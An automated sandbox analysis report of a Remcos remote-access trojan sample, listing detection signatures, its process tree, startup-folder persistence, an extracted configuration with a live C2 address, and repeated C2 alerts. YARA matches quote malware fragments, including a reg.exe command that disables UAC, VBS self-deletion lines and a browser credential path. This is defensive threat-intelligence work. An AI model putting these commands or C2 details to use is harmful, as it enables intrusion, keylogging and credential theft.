Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
l1QC9H0SNR.exe

Overview

General Information

Sample name:l1QC9H0SNR.exe
renamed because original name is a hash value
Original sample name:c889443786dc57c284a40fd1a9764bad2f026a8c20e191059707d1646ff931e0.exe
Analysis ID:1588244
MD5:be20dfffcba37064d6087aa714036873
SHA1:4f50f7f954ed27b8e3373a5d900905d98d1bb51e
SHA256:c889443786dc57c284a40fd1a9764bad2f026a8c20e191059707d1646ff931e0
Tags:exeRemcosRATuser-adrian__luca
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Drops VBS files to the startup folder
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to execute programs as a different user
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • l1QC9H0SNR.exe (PID: 5912 cmdline: "C:\Users\user\Desktop\l1QC9H0SNR.exe" MD5: BE20DFFFCBA37064D6087AA714036873)
    • Milburr.exe (PID: 3652 cmdline: "C:\Users\user\Desktop\l1QC9H0SNR.exe" MD5: BE20DFFFCBA37064D6087AA714036873)
  • wscript.exe (PID: 4156 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Milburr.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • Milburr.exe (PID: 364 cmdline: "C:\Users\user\AppData\Local\obtenebrate\Milburr.exe" MD5: BE20DFFFCBA37064D6087AA714036873)
      • Milburr.exe (PID: 5160 cmdline: "C:\Users\user\AppData\Local\obtenebrate\Milburr.exe" MD5: BE20DFFFCBA37064D6087AA714036873)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["192.210.150.26:3678:0"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-MKYDDH", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": ""}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000002.00000002.4575991012.0000000003E6F000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000005.00000002.2281153273.000000000151B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000005.00000002.2281175297.0000000001557000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000002.00000002.4573869491.0000000001151000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            00000005.00000002.2280428273.0000000000400000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              Click to see the 43 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              2.2.Milburr.exe.400000.0.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                2.2.Milburr.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                  2.2.Milburr.exe.400000.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                    2.2.Milburr.exe.400000.0.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                    • 0x6b6f8:$a1: Remcos restarted by watchdog!
                    • 0x6bc70:$a3: %02i:%02i:%02i:%03i
                    2.2.Milburr.exe.400000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
                    • 0x65994:$str_a1: C:\Windows\System32\cmd.exe
                    • 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                    • 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                    • 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                    • 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                    • 0x65a04:$str_b2: Executing file:
                    • 0x6683c:$str_b3: GetDirectListeningPort
                    • 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                    • 0x66380:$str_b7: \update.vbs
                    • 0x65a2c:$str_b9: Downloaded file:
                    • 0x65a18:$str_b10: Downloading file:
                    • 0x65abc:$str_b12: Failed to upload file:
                    • 0x66804:$str_b13: StartForward
                    • 0x66824:$str_b14: StopForward
                    • 0x662d8:$str_b15: fso.DeleteFile "
                    • 0x6626c:$str_b16: On Error Resume Next
                    • 0x66308:$str_b17: fso.DeleteFolder "
                    • 0x65aac:$str_b18: Uploaded file:
                    • 0x65a6c:$str_b19: Unable to delete:
                    • 0x662a0:$str_b20: while fso.FileExists("
                    • 0x65f49:$str_c0: [Firefox StoredLogins not found]
                    Click to see the 55 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: WScript or CScript Dropper
                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Milburr.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Milburr.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Milburr.vbs" , ProcessId: 4156, ProcessName: wscript.exe
                    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Milburr.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Milburr.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Milburr.vbs" , ProcessId: 4156, ProcessName: wscript.exe

                    Data Obfuscation

                    barindex
                    Sigma detected: Drops script at startup location
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe, ProcessId: 3652, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Milburr.vbs

                    Stealing of Sensitive Information

                    barindex
                    Sigma detected: Remcos
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe, ProcessId: 3652, TargetFilename: C:\ProgramData\remcos\logs.dat

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-10T23:00:29.468941+010020327761Malware Command and Control Activity Detected192.168.2.649709192.210.150.263678TCP
                    2025-01-10T23:00:31.947273+010020327761Malware Command and Control Activity Detected192.168.2.649711192.210.150.263678TCP
                    2025-01-10T23:00:34.368796+010020327761Malware Command and Control Activity Detected192.168.2.649713192.210.150.263678TCP
                    2025-01-10T23:00:37.665119+010020327761Malware Command and Control Activity Detected192.168.2.649724192.210.150.263678TCP
                    2025-01-10T23:00:40.092206+010020327761Malware Command and Control Activity Detected192.168.2.649741192.210.150.263678TCP
                    2025-01-10T23:00:42.521701+010020327761Malware Command and Control Activity Detected192.168.2.649761192.210.150.263678TCP
                    2025-01-10T23:00:44.952021+010020327761Malware Command and Control Activity Detected192.168.2.649779192.210.150.263678TCP
                    2025-01-10T23:00:47.369791+010020327761Malware Command and Control Activity Detected192.168.2.649798192.210.150.263678TCP
                    2025-01-10T23:00:49.806042+010020327761Malware Command and Control Activity Detected192.168.2.649814192.210.150.263678TCP
                    2025-01-10T23:00:52.275053+010020327761Malware Command and Control Activity Detected192.168.2.649829192.210.150.263678TCP
                    2025-01-10T23:00:54.728155+010020327761Malware Command and Control Activity Detected192.168.2.649842192.210.150.263678TCP
                    2025-01-10T23:00:57.198302+010020327761Malware Command and Control Activity Detected192.168.2.649858192.210.150.263678TCP
                    2025-01-10T23:00:59.634762+010020327761Malware Command and Control Activity Detected192.168.2.649877192.210.150.263678TCP
                    2025-01-10T23:01:02.055857+010020327761Malware Command and Control Activity Detected192.168.2.649893192.210.150.263678TCP
                    2025-01-10T23:01:04.527659+010020327761Malware Command and Control Activity Detected192.168.2.649908192.210.150.263678TCP
                    2025-01-10T23:01:07.009273+010020327761Malware Command and Control Activity Detected192.168.2.649921192.210.150.263678TCP
                    2025-01-10T23:01:09.462163+010020327761Malware Command and Control Activity Detected192.168.2.649937192.210.150.263678TCP
                    2025-01-10T23:01:12.012999+010020327761Malware Command and Control Activity Detected192.168.2.649955192.210.150.263678TCP
                    2025-01-10T23:01:14.448056+010020327761Malware Command and Control Activity Detected192.168.2.649971192.210.150.263678TCP
                    2025-01-10T23:01:16.946591+010020327761Malware Command and Control Activity Detected192.168.2.649988192.210.150.263678TCP
                    2025-01-10T23:01:19.371772+010020327761Malware Command and Control Activity Detected192.168.2.650005192.210.150.263678TCP
                    2025-01-10T23:01:21.821959+010020327761Malware Command and Control Activity Detected192.168.2.650006192.210.150.263678TCP
                    2025-01-10T23:01:24.243694+010020327761Malware Command and Control Activity Detected192.168.2.650008192.210.150.263678TCP
                    2025-01-10T23:01:26.665361+010020327761Malware Command and Control Activity Detected192.168.2.650009192.210.150.263678TCP
                    2025-01-10T23:01:29.106561+010020327761Malware Command and Control Activity Detected192.168.2.650010192.210.150.263678TCP
                    2025-01-10T23:01:31.524979+010020327761Malware Command and Control Activity Detected192.168.2.650011192.210.150.263678TCP
                    2025-01-10T23:01:33.977695+010020327761Malware Command and Control Activity Detected192.168.2.650012192.210.150.263678TCP
                    2025-01-10T23:01:36.400509+010020327761Malware Command and Control Activity Detected192.168.2.650013192.210.150.263678TCP
                    2025-01-10T23:01:38.826379+010020327761Malware Command and Control Activity Detected192.168.2.650015192.210.150.263678TCP
                    2025-01-10T23:01:41.259088+010020327761Malware Command and Control Activity Detected192.168.2.650016192.210.150.263678TCP
                    2025-01-10T23:01:43.680924+010020327761Malware Command and Control Activity Detected192.168.2.650017192.210.150.263678TCP
                    2025-01-10T23:01:46.668953+010020327761Malware Command and Control Activity Detected192.168.2.650018192.210.150.263678TCP
                    2025-01-10T23:01:49.087251+010020327761Malware Command and Control Activity Detected192.168.2.650020192.210.150.263678TCP
                    2025-01-10T23:01:51.493566+010020327761Malware Command and Control Activity Detected192.168.2.650021192.210.150.263678TCP
                    2025-01-10T23:01:53.986539+010020327761Malware Command and Control Activity Detected192.168.2.650022192.210.150.263678TCP
                    2025-01-10T23:01:56.326471+010020327761Malware Command and Control Activity Detected192.168.2.650023192.210.150.263678TCP
                    2025-01-10T23:01:58.634713+010020327761Malware Command and Control Activity Detected192.168.2.650024192.210.150.263678TCP
                    2025-01-10T23:02:00.946791+010020327761Malware Command and Control Activity Detected192.168.2.650025192.210.150.263678TCP
                    2025-01-10T23:02:03.181016+010020327761Malware Command and Control Activity Detected192.168.2.650026192.210.150.263678TCP
                    2025-01-10T23:02:05.383980+010020327761Malware Command and Control Activity Detected192.168.2.650028192.210.150.263678TCP
                    2025-01-10T23:02:07.571463+010020327761Malware Command and Control Activity Detected192.168.2.650029192.210.150.263678TCP
                    2025-01-10T23:02:09.775046+010020327761Malware Command and Control Activity Detected192.168.2.650030192.210.150.263678TCP
                    2025-01-10T23:02:11.931129+010020327761Malware Command and Control Activity Detected192.168.2.650031192.210.150.263678TCP
                    2025-01-10T23:02:14.064052+010020327761Malware Command and Control Activity Detected192.168.2.650032192.210.150.263678TCP
                    2025-01-10T23:02:16.138451+010020327761Malware Command and Control Activity Detected192.168.2.650033192.210.150.263678TCP
                    2025-01-10T23:02:18.212413+010020327761Malware Command and Control Activity Detected192.168.2.650034192.210.150.263678TCP
                    2025-01-10T23:02:20.276370+010020327761Malware Command and Control Activity Detected192.168.2.650035192.210.150.263678TCP
                    2025-01-10T23:02:22.326515+010020327761Malware Command and Control Activity Detected192.168.2.650036192.210.150.263678TCP
                    2025-01-10T23:02:24.368630+010020327761Malware Command and Control Activity Detected192.168.2.650037192.210.150.263678TCP
                    2025-01-10T23:02:26.382539+010020327761Malware Command and Control Activity Detected192.168.2.650038192.210.150.263678TCP
                    2025-01-10T23:02:28.430823+010020327761Malware Command and Control Activity Detected192.168.2.650039192.210.150.263678TCP
                    2025-01-10T23:02:30.388017+010020327761Malware Command and Control Activity Detected192.168.2.650040192.210.150.263678TCP
                    2025-01-10T23:02:32.382612+010020327761Malware Command and Control Activity Detected192.168.2.650041192.210.150.263678TCP
                    2025-01-10T23:02:34.322505+010020327761Malware Command and Control Activity Detected192.168.2.650043192.210.150.263678TCP
                    2025-01-10T23:02:36.212518+010020327761Malware Command and Control Activity Detected192.168.2.650044192.210.150.263678TCP
                    2025-01-10T23:02:38.090796+010020327761Malware Command and Control Activity Detected192.168.2.650045192.210.150.263678TCP
                    2025-01-10T23:02:39.993563+010020327761Malware Command and Control Activity Detected192.168.2.650046192.210.150.263678TCP
                    2025-01-10T23:02:41.950190+010020327761Malware Command and Control Activity Detected192.168.2.650047192.210.150.263678TCP
                    2025-01-10T23:02:43.775780+010020327761Malware Command and Control Activity Detected192.168.2.650048192.210.150.263678TCP
                    2025-01-10T23:02:45.603130+010020327761Malware Command and Control Activity Detected192.168.2.650049192.210.150.263678TCP
                    2025-01-10T23:02:47.431543+010020327761Malware Command and Control Activity Detected192.168.2.650050192.210.150.263678TCP
                    2025-01-10T23:02:49.244013+010020327761Malware Command and Control Activity Detected192.168.2.650051192.210.150.263678TCP
                    2025-01-10T23:02:51.337478+010020327761Malware Command and Control Activity Detected192.168.2.650052192.210.150.263678TCP
                    2025-01-10T23:02:53.118512+010020327761Malware Command and Control Activity Detected192.168.2.650053192.210.150.263678TCP
                    2025-01-10T23:02:54.884158+010020327761Malware Command and Control Activity Detected192.168.2.650054192.210.150.263678TCP
                    2025-01-10T23:02:56.659605+010020327761Malware Command and Control Activity Detected192.168.2.650055192.210.150.263678TCP
                    2025-01-10T23:02:58.430966+010020327761Malware Command and Control Activity Detected192.168.2.650056192.210.150.263678TCP
                    2025-01-10T23:03:00.165763+010020327761Malware Command and Control Activity Detected192.168.2.650057192.210.150.263678TCP
                    2025-01-10T23:03:01.884055+010020327761Malware Command and Control Activity Detected192.168.2.650058192.210.150.263678TCP
                    2025-01-10T23:03:03.604295+010020327761Malware Command and Control Activity Detected192.168.2.650059192.210.150.263678TCP
                    2025-01-10T23:03:05.306266+010020327761Malware Command and Control Activity Detected192.168.2.650060192.210.150.263678TCP
                    2025-01-10T23:03:06.993987+010020327761Malware Command and Control Activity Detected192.168.2.650061192.210.150.263678TCP
                    2025-01-10T23:03:08.696361+010020327761Malware Command and Control Activity Detected192.168.2.650062192.210.150.263678TCP
                    2025-01-10T23:03:10.386485+010020327761Malware Command and Control Activity Detected192.168.2.650064192.210.150.263678TCP
                    2025-01-10T23:03:12.072832+010020327761Malware Command and Control Activity Detected192.168.2.650066192.210.150.263678TCP
                    2025-01-10T23:03:13.729115+010020327761Malware Command and Control Activity Detected192.168.2.650067192.210.150.263678TCP
                    2025-01-10T23:03:15.384777+010020327761Malware Command and Control Activity Detected192.168.2.650068192.210.150.263678TCP
                    2025-01-10T23:03:17.103031+010020327761Malware Command and Control Activity Detected192.168.2.650069192.210.150.263678TCP
                    2025-01-10T23:03:18.750328+010020327761Malware Command and Control Activity Detected192.168.2.650070192.210.150.263678TCP
                    2025-01-10T23:03:20.402437+010020327761Malware Command and Control Activity Detected192.168.2.650071192.210.150.263678TCP
                    2025-01-10T23:03:22.025051+010020327761Malware Command and Control Activity Detected192.168.2.650072192.210.150.263678TCP
                    2025-01-10T23:03:23.635600+010020327761Malware Command and Control Activity Detected192.168.2.650073192.210.150.263678TCP
                    2025-01-10T23:03:25.296460+010020327761Malware Command and Control Activity Detected192.168.2.650074192.210.150.263678TCP
                    2025-01-10T23:03:26.915958+010020327761Malware Command and Control Activity Detected192.168.2.650075192.210.150.263678TCP
                    2025-01-10T23:03:28.509428+010020327761Malware Command and Control Activity Detected192.168.2.650076192.210.150.263678TCP
                    2025-01-10T23:03:30.103290+010020327761Malware Command and Control Activity Detected192.168.2.650077192.210.150.263678TCP
                    2025-01-10T23:03:31.665583+010020327761Malware Command and Control Activity Detected192.168.2.650078192.210.150.263678TCP
                    2025-01-10T23:03:33.306634+010020327761Malware Command and Control Activity Detected192.168.2.650079192.210.150.263678TCP
                    2025-01-10T23:03:34.870987+010020327761Malware Command and Control Activity Detected192.168.2.650080192.210.150.263678TCP
                    2025-01-10T23:03:36.432271+010020327761Malware Command and Control Activity Detected192.168.2.650081192.210.150.263678TCP
                    2025-01-10T23:03:38.151695+010020327761Malware Command and Control Activity Detected192.168.2.650082192.210.150.263678TCP
                    2025-01-10T23:03:39.712526+010020327761Malware Command and Control Activity Detected192.168.2.650083192.210.150.263678TCP
                    2025-01-10T23:03:41.428858+010020327761Malware Command and Control Activity Detected192.168.2.650084192.210.150.263678TCP
                    2025-01-10T23:03:42.977891+010020327761Malware Command and Control Activity Detected192.168.2.650085192.210.150.263678TCP
                    2025-01-10T23:03:44.509043+010020327761Malware Command and Control Activity Detected192.168.2.650086192.210.150.263678TCP
                    2025-01-10T23:03:46.071726+010020327761Malware Command and Control Activity Detected192.168.2.650087192.210.150.263678TCP
                    2025-01-10T23:03:47.618682+010020327761Malware Command and Control Activity Detected192.168.2.650088192.210.150.263678TCP
                    2025-01-10T23:03:49.149727+010020327761Malware Command and Control Activity Detected192.168.2.650089192.210.150.263678TCP
                    2025-01-10T23:03:50.697206+010020327761Malware Command and Control Activity Detected192.168.2.650090192.210.150.263678TCP
                    2025-01-10T23:03:52.228002+010020327761Malware Command and Control Activity Detected192.168.2.650091192.210.150.263678TCP
                    2025-01-10T23:03:53.790232+010020327761Malware Command and Control Activity Detected192.168.2.650092192.210.150.263678TCP
                    2025-01-10T23:03:55.337388+010020327761Malware Command and Control Activity Detected192.168.2.650093192.210.150.263678TCP
                    2025-01-10T23:03:56.855743+010020327761Malware Command and Control Activity Detected192.168.2.650094192.210.150.263678TCP
                    2025-01-10T23:03:58.400066+010020327761Malware Command and Control Activity Detected192.168.2.650095192.210.150.263678TCP
                    2025-01-10T23:03:59.954954+010020327761Malware Command and Control Activity Detected192.168.2.650096192.210.150.263678TCP
                    2025-01-10T23:04:01.478076+010020327761Malware Command and Control Activity Detected192.168.2.650097192.210.150.263678TCP
                    2025-01-10T23:04:02.978913+010020327761Malware Command and Control Activity Detected192.168.2.650098192.210.150.263678TCP
                    2025-01-10T23:04:04.463825+010020327761Malware Command and Control Activity Detected192.168.2.650100192.210.150.263678TCP
                    2025-01-10T23:04:05.962236+010020327761Malware Command and Control Activity Detected192.168.2.650101192.210.150.263678TCP
                    2025-01-10T23:04:07.478773+010020327761Malware Command and Control Activity Detected192.168.2.650102192.210.150.263678TCP
                    2025-01-10T23:04:08.977665+010020327761Malware Command and Control Activity Detected192.168.2.650103192.210.150.263678TCP
                    2025-01-10T23:04:10.447012+010020327761Malware Command and Control Activity Detected192.168.2.650104192.210.150.263678TCP
                    2025-01-10T23:04:11.930882+010020327761Malware Command and Control Activity Detected192.168.2.650105192.210.150.263678TCP
                    2025-01-10T23:04:13.400548+010020327761Malware Command and Control Activity Detected192.168.2.650106192.210.150.263678TCP
                    2025-01-10T23:04:14.884448+010020327761Malware Command and Control Activity Detected192.168.2.650107192.210.150.263678TCP
                    2025-01-10T23:04:16.369010+010020327761Malware Command and Control Activity Detected192.168.2.650108192.210.150.263678TCP
                    2025-01-10T23:04:17.854766+010020327761Malware Command and Control Activity Detected192.168.2.650109192.210.150.263678TCP
                    2025-01-10T23:04:19.400123+010020327761Malware Command and Control Activity Detected192.168.2.650110192.210.150.263678TCP
                    2025-01-10T23:04:20.902762+010020327761Malware Command and Control Activity Detected192.168.2.650111192.210.150.263678TCP
                    2025-01-10T23:04:22.384249+010020327761Malware Command and Control Activity Detected192.168.2.650112192.210.150.263678TCP
                    2025-01-10T23:04:23.853477+010020327761Malware Command and Control Activity Detected192.168.2.650113192.210.150.263678TCP
                    2025-01-10T23:04:25.321961+010020327761Malware Command and Control Activity Detected192.168.2.650114192.210.150.263678TCP
                    2025-01-10T23:04:26.790484+010020327761Malware Command and Control Activity Detected192.168.2.650115192.210.150.263678TCP
                    2025-01-10T23:04:28.259264+010020327761Malware Command and Control Activity Detected192.168.2.650116192.210.150.263678TCP
                    2025-01-10T23:04:29.776044+010020327761Malware Command and Control Activity Detected192.168.2.650117192.210.150.263678TCP
                    2025-01-10T23:04:31.305922+010020327761Malware Command and Control Activity Detected192.168.2.650118192.210.150.263678TCP
                    2025-01-10T23:04:34.072096+010020327761Malware Command and Control Activity Detected192.168.2.650119192.210.150.263678TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 00000005.00000002.2281175297.0000000001557000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["192.210.150.26:3678:0"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-MKYDDH", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": ""}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeReversingLabs: Detection: 75%
                    Multi AV Scanner detection for submitted file
                    Source: l1QC9H0SNR.exeVirustotal: Detection: 68%Perma Link
                    Source: l1QC9H0SNR.exeReversingLabs: Detection: 75%
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 2.2.Milburr.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.Milburr.exe.3630000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.Milburr.exe.3280000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Milburr.exe.3d80000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.Milburr.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Milburr.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.Milburr.exe.3280000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Milburr.exe.3d80000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Milburr.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.Milburr.exe.3630000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.4575991012.0000000003E6F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2281153273.000000000151B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2281175297.0000000001557000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4573869491.0000000001151000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2280428273.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4573965402.0000000001187000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.2273702079.0000000003280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4573167433.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4574181082.0000000003630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2281391837.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4567862337.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Milburr.exe PID: 3652, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Milburr.exe PID: 364, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Milburr.exe PID: 5160, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability
                    Machine Learning detection for dropped file
